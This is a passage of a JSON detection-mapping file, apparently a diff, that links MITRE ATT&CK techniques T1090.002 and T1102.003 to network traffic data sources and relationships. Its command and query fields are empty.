This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1090.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1102.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
